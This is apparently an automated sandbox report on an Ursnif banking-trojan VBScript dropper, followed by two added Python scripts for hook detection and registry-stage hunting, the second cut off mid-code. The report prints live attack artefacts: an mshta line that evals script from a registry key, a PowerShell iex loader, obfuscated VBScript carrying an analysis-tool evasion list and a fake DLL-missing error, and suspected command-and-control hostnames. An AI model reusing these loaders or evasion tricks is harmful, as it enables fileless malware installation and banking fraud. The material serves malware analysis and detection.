    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
    Content-Length: 2
    Host: art.microsoftsofymicrosoftsoft.at
Source: unknown | DNS traffic detected: queries for: atl.bigbigpoppa.com

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected Ursnif
                      Source: Yara match | File source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
                      Source: Yara match | File source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      Yara detected Ursnif (same Yara match sources as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above)
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_01203276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

                      System Summary:

                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_01201754
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_01207E30
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_0120725F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7CE95C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7DB948
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7DB230
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D5164
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C1164
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C4150
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7B0000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7B2138
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C0124
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7CA9F8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C7820
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7B1000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7B90FC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C70C8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D88B8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7CF7B4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7E4796
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7CA790
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7B3610
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D2EF8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7B76F4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D5ED8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7CC6C4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C2EC0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D06B4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D6EA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C6684
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C9500
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C1DF4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D4DE0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C5DBC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C559C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D9408
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D3400
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7B74A4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C4484
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7B4B60
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D4354
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7B1348
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C8340
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7CD328
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D730C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7BABDC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7DA3A4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D4BA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7CBA74
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7B9AD8
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_012040DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_01208055 NtQueryVirtualMemory
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7CE95C NtSetContextThread,NtUnmapViewOfSection
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C1950 NtWriteVirtualMemory
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7CE860 NtQueryInformationProcess
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7DA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D20A4 NtQueryInformationToken,NtQueryInformationToken
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C8B90 NtMapViewOfSection
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C5B80 NtCreateSection
                      Source: 1cv1ijms.dll.41.dr | Static PE information: No import functions for PE file found
                      Source: start[526268].vbs | Initial sample: Strings found which are bigger than 50
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs'
                      Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: unknown | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
                      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210910
                      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
                      Source: classification engine | Classification label: mal100.troj.evad.winVBS@17/16@6/1
                      Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_01202102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{9E926C87-6559-80BB-DFB2-69B48306AD28}
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: start[526268].vbs | Static file information: File size 1402115 > 1048576
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.391888818.000002CC178CF000.00000004.00000001.sdmp, fum.cpp.0.dr
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp

                      Data Obfuscation:

                      VBScript performs obfuscated calls to suspicious functions
                      Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = 
Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_01207E1F push ecx; ret 34_2_01207E2F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_01207AB0 push ecx; ret 34_2_01207AB9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7E1000 push eax; retf 39_2_0000019D8B7E1181
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7BC6E9 push 3B000001h; retf 39_2_0000019D8B7BC6EE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'

                      Persistence and Installation Behavior:

                      Creates processes via WMI
                      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\fum.cpp (dropped file)
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dll (dropped file)

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif (same Yara match sources as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above)
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\start[526268].vbs
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
Note: the KERNEL32.DLL entry is an export of kernel32 itself (an EAT change), while the user32.dll entry is user32's import of CreateProcessW through the api-set (an IAT change). The two redirected addresses lie 0x1C bytes apart (7FFB70FF5200 and 7FFB70FF521C), consistent with a single trampoline table in the code injected into explorer.exe, which intercepts process creation on both the export and the import side and hides its registry storage key via RegGetValueW.
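Added triage example (not part of this report and not Joe Sandbox's hook detector): offline checks for the two hook classes listed above, run over data lifted from a process snapshot. The module ranges, the clean prolog bytes and the IAT rows below are constructed for illustration; only the function names and the 7FFB70FF521C address come from the report, and the constructed kernel32 range is chosen so that this address falls outside it, which is what a hooked import slot looks like in a real dump.

```python
"""Offline user-mode hook triage over data lifted from a process snapshot.
All sample data below is constructed for illustration (see lead-in)."""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Module:
    name: str
    base: int
    size: int

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


# Constructed module map of the inspected process (not explorer.exe's real layout).
MODULES: Dict[str, Module] = {
    "kernel32.dll": Module("kernel32.dll", 0x7FFB71000000, 0xB0000),
    "user32.dll": Module("user32.dll", 0x7FFB72000000, 0x1A0000),
}

# Constructed IAT rows: (importing module, exporting module, function, resolved address).
# The first address is the one the report lists; the kernel32 range above is chosen so
# that it falls outside kernel32, as a hooked slot would in a real snapshot.
SAMPLE_IAT: List[Tuple[str, str, str, int]] = [
    ("explorer.exe", "kernel32.dll", "CreateProcessAsUserW", 0x7FFB70FF521C),
    ("explorer.exe", "kernel32.dll", "CreateFileW", 0x7FFB71023450),
    ("explorer.exe", "user32.dll", "MessageBoxW", 0x7FFB720A1100),
]

# Constructed first-7-byte prologs: on-disk image vs. live memory.
SAMPLE_DISK: Dict[str, bytes] = {
    "CreateProcessAsUserW": bytes.fromhex("4c8bdc4883ec58"),
    "CreateFileW": bytes.fromhex("4c8bdc48895b18"),
}
SAMPLE_MEM: Dict[str, bytes] = {
    "CreateProcessAsUserW": bytes.fromhex("e9a3f1ffff4858"),  # rel32 jmp patched in
    "CreateFileW": bytes.fromhex("4c8bdc48895b18"),           # untouched
}


def find_iat_hooks(iat, modules: Dict[str, Module]) -> List[str]:
    """An IAT slot must resolve into the image range of the module that exports the
    function. Anything else (heap, private RWX region, another module) is reported."""
    hits = []
    for importer, exporter, func, addr in iat:
        mod = modules.get(exporter.lower())
        if mod is None or not mod.contains(addr):
            hits.append(f"{importer}: {exporter}!{func} -> {addr:#x} outside {exporter}")
    return hits


def find_inline_hooks(mem: Dict[str, bytes], disk: Dict[str, bytes]) -> List[str]:
    """Compare the first bytes of each function in memory with the on-disk image.
    Prologs carry no relocations, so any difference is a patch; the common trampoline
    forms are classified so the analyst knows how to follow the jump."""
    hits = []
    for func, clean in disk.items():
        live = mem.get(func)
        if live is None or live == clean:
            continue
        if live[0] == 0xE9:
            kind = "jmp rel32"
        elif live[:2] == b"\xff\x25":
            kind = "jmp [rip+disp32]"
        elif live[:2] == b"\x48\xb8" and len(live) >= 12 and live[10:12] == b"\xff\xe0":
            kind = "mov rax, imm64; jmp rax"
        else:
            kind = "modified"
        hits.append(f"{func}: prolog changed ({kind}): {live.hex(' ')}")
    return hits


if __name__ == "__main__":
    for line in find_iat_hooks(SAMPLE_IAT, MODULES) + find_inline_hooks(SAMPLE_MEM, SAMPLE_DISK):
        print(line)
```

On a live system the same two comparisons are what tools such as Volatility's apihooks plugin perform; the on-disk prolog should be read from the mapped image on disk, not from another process, because the hook module may have patched every process it injected into.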
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDate
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
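Added hunting example (not part of this report): the GUID-named key under HKCU\Software\AppDataLow\Software\Microsoft is where this sample keeps its later stages, and the mshta and PowerShell stages read them back with regread and `[Text.Encoding]::ASCII.GetString((gp key).UtilTool)`. The script below parses a `reg export` of that hive, finds GUID-named storage keys and decodes each value the same way, so an analyst can see which values hold script and which are opaque blobs. The .reg text is constructed for the example; the value contents are not the sample's real data.

```python
"""Hunt registry-resident stages under HKCU\\Software\\AppDataLow\\Software\\Microsoft\\<GUID>
in a .reg export and decode them the way the report's PowerShell one-liner does.
The export text below is constructed; the values are not the sample's real data."""
import re
from typing import Dict, List, Tuple

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550]
"UtilDate"=hex:d0,9a,b1,61,00,00,00,00
"UtilTool"=hex:41,64,64,2d,54,79,70,65,20,2d,54,79,70,65,44,65,66,69,6e,69,\
  74,69,6f,6e,20,24,73,72,63,3b,69,65,78,20,24,72,75,6e
"DeviceFile"="new ActiveXObject(\"WScript.Shell\").Run(\"powershell -w hidden\",0);window.flag=1;"

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\Internet Explorer]
"Unrelated"="1"
'''

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VAL_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')
# Storage key pattern seen in this report: a GUID-named subkey directly under AppDataLow\Software\Microsoft.
TARGET_RE = re.compile(
    r"\\Software\\AppDataLow\\Software\\Microsoft\\[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}$", re.I)
SCRIPT_MARKERS = ("iex", "invoke-expression", "add-type", "frombase64string", "activexobject", "eval(")


def parse_reg(text: str) -> Dict[str, Dict[str, Tuple[str, object]]]:
    """Minimal .reg reader: keys, REG_SZ and REG_BINARY (hex:) values, with the backslash
    continuation lines that `reg export` emits joined back together.
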